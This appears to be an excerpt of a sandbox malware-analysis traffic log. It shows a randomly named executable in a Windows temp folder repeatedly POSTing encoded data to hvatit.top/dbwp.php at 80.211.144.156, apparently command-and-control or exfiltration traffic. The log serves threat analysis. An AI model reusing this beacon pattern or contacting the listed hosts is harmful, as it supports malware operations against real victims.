                                                        Aug 31, 2024 09:32:51.958615065 CEST | 2560 | OUT | Data Raw: 5a 5d 59 56 5f 5e 55 56 5d 5f 54 57 54 5c 5b 52 5a 55 59 59 52 53 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]YV_^UV]_TWT\[RZUYYRSTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.01?)T"4_./848(W':<&%;'(3^< 8!]'/Z,5
                                                        Aug 31, 2024 09:32:52.285000086 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:52.480930090 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        49 | 192.168.2.4 | 49786 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:52.602215052 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:52.958568096 CEST | 2560 | OUT | Data Raw: 5a 5c 5c 52 5a 5f 50 52 5d 5f 54 57 54 51 5b 54 5a 5c 59 5d 52 51 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\RZ_PR]_TWTQ[TZ\Y]RQT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$"9?) R!.<9?/7(3*3$6('[9<\=<+8!]'/Z,
                                                        Aug 31, 2024 09:32:53.292845964 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:53.492141008 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        50 | 192.168.2.4 | 49787 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:53.616319895 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:53.974539995 CEST | 2560 | OUT | Data Raw: 5a 59 59 57 5a 5b 55 52 5d 5f 54 57 54 59 5b 5d 5a 50 59 53 52 51 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYWZ[UR]_TWTY[]ZPYSRQT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X3B?_76.^-?74;'?'/Z'=+++\(</R.?!]'/Z,!
                                                        Aug 31, 2024 09:32:54.280605078 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:54.478384972 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        51 | 192.168.2.4 | 49788 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:54.542828083 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        52 | 192.168.2.4 | 49789 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:54.606400013 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:54.958638906 CEST | 2560 | OUT | Data Raw: 5f 58 5c 51 5f 58 50 53 5d 5f 54 57 54 59 5b 54 5a 52 59 5d 52 5c 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _X\Q_XPS]_TWTY[TZRY]R\T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[31-=)'#.Z-,#Y7?'\4$%&>!(83=/(./!]'/Z,!
                                                        Aug 31, 2024 09:32:55.290810108 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:55.487972975 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        53 | 192.168.2.4 | 49790 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:55.616673946 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:55.974212885 CEST | 2560 | OUT | Data Raw: 5a 5f 5c 52 5f 5a 50 54 5d 5f 54 57 54 5f 5b 51 5a 52 59 5c 52 50 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_\R_ZPT]_TWT_[QZRY\RPTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.3!B<;!.:/430'C+02T<;+/8?!]'/Z,
                                                        Aug 31, 2024 09:32:56.327167988 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:56.457505941 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        54 | 192.168.2.4 | 49791 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:56.585948944 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:56.942959070 CEST | 2560 | OUT | Data Raw: 5a 54 59 5e 5f 59 50 5d 5d 5f 54 57 54 5c 5b 52 5a 5c 59 5e 52 5c 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTY^_YP]]_TWT\[RZ\Y^R\TZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.&!"@<8#-':/^7( U3*Q3&8'-T+(,<</!]'/Z,5
                                                        Aug 31, 2024 09:32:57.269768953 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:57.474776983 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        55 | 192.168.2.4 | 49792 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:57.602408886 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:57.958698988 CEST | 2560 | OUT | Data Raw: 5a 54 59 57 5a 5e 50 53 5d 5f 54 57 54 5b 5b 57 5a 53 59 5b 52 50 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTYWZ^PS]_TWT[[WZSY[RPT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!"@=: W"=8]-<,7'*(36<&.1+3Y+$,!]'/Z,)
                                                        Aug 31, 2024 09:32:58.264861107 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:58.460954905 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        56 | 192.168.2.4 | 49793 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:58.586018085 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:58.942951918 CEST | 2560 | OUT | Data Raw: 5f 58 59 56 5a 58 55 50 5d 5f 54 57 54 5a 5b 5c 5a 52 59 5d 52 53 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _XYVZXUP]_TWTZ[\ZRY]RSTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-0!(:#".?; (T&9($50[&U(3](? /?!]'/Z,-
                                                        Aug 31, 2024 09:32:59.275491953 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:59.464502096 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        57 | 192.168.2.4 | 49794 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:59.589701891 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        58 | 192.168.2.4 | 49795 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:59.620682001 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:00.011367083 CEST | 1436 | OUT | Data Raw: 5f 59 5c 54 5a 5d 50 56 5d 5f 54 57 54 59 5b 56 5a 50 59 58 52 50 54 53 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _Y\TZ]PV]_TWTY[VZPYXRPTSQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$1(9'#>8.,#Z ]$S&*7$543!(_?,8?!]'/Z,!
                                                        Aug 31, 2024 09:33:00.310025930 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:00.501486063 CEST | 308 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 55 33 38 2e 1d 23 2b 31 0b 3e 02 32 0e 27 56 23 5a 38 31 29 07 2a 17 16 01 3e 3a 28 50 27 3d 02 5b 33 16 36 1f 32 01 06 1e 27 34 21 5b 07 10 22 12 31 00 3c 00 2c 02 22 58 26 30 00 02 21 21 26 5b 2a 3d 0b 1e 22 02 3d 19 30 5e 25 0b 3b 2a 31 0d 28 58 28 07 29 5e 3c 11 27 38 2b 50 00 12 26 19 26 01 28 1e 36 3d 2a 5a 21 5e 23 10 24 36 27 5f 34 3b 20 58 29 38 26 0d 25 3f 32 1c 20 30 22 01 25 1c 07 02 3c 3e 01 18 29 16 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #U38.#+1>2'V#Z81)*>:(P'=[362'4!["1<,"X&0!!&[*="=0^%;*1(X()^<'8+P&&(6=*Z!^#$6'_4; X)8&%?2 0"%<>)&].#V6YV


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        59 | 192.168.2.4 | 49796 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:32:59.748198032 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:00.100049973 CEST | 2560 | OUT | Data Raw: 5a 5d 5c 54 5a 55 50 5d 5d 5f 54 57 54 50 5b 50 5a 5c 59 58 52 5c 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]\TZUP]]_TWTP[PZ\YXR\T_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$"%(9?6>8_9?,7$U'(T$'$-%+(?]<Z#W./!]'/Z,
                                                        Aug 31, 2024 09:33:00.432357073 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:00.563625097 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        60 | 192.168.2.4 | 49797 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:00.693032026 CEST | 218 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:33:01.052381992 CEST | 2560 | OUT | Data Raw: 5a 58 5c 53 5f 5f 50 53 5d 5f 54 57 54 5c 5b 56 5a 55 59 5a 52 50 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZX\S__PS]_TWT\[VZUYZRPT^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&!1?9T!:<$7;U38W&&+Z$=<(+U.?!]'/Z,5
                                                        Aug 31, 2024 09:33:01.357017040 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:01.483724117 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        61 | 192.168.2.4 | 49798 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:01.615559101 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:01.974189043 CEST | 2560 | OUT | Data Raw: 5a 54 59 57 5a 58 50 5c 5d 5f 54 57 54 59 5b 53 5a 5c 59 52 52 53 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTYWZXP\]_TWTY[SZ\YRRST\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.'!!()+#>9?7_"88T&*;0X')*+$+'W./!]'/Z,!
                                                        Aug 31, 2024 09:33:02.296930075 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:02.497220039 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        62 | 192.168.2.4 | 49799 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:02.659742117 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:33:03.005532980 CEST | 2560 | OUT | Data Raw: 5f 5d 59 5f 5f 59 50 51 5d 5f 54 57 54 51 5b 52 5a 56 59 5c 52 55 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]Y__YPQ]_TWTQ[RZVY\RUTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.\$2)+;!\-<3[ ;#39?0C?0S((,<+U/!]'/Z,
                                                        Aug 31, 2024 09:33:03.316628933 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:33:03.522239923 CEST | 158 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:33:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        63 | 192.168.2.4 | 49800 | 80.211.144.156 | 80 | 7668 | C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Aug 31, 2024 09:33:03.649830103 CEST | 242 | OUT | POST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
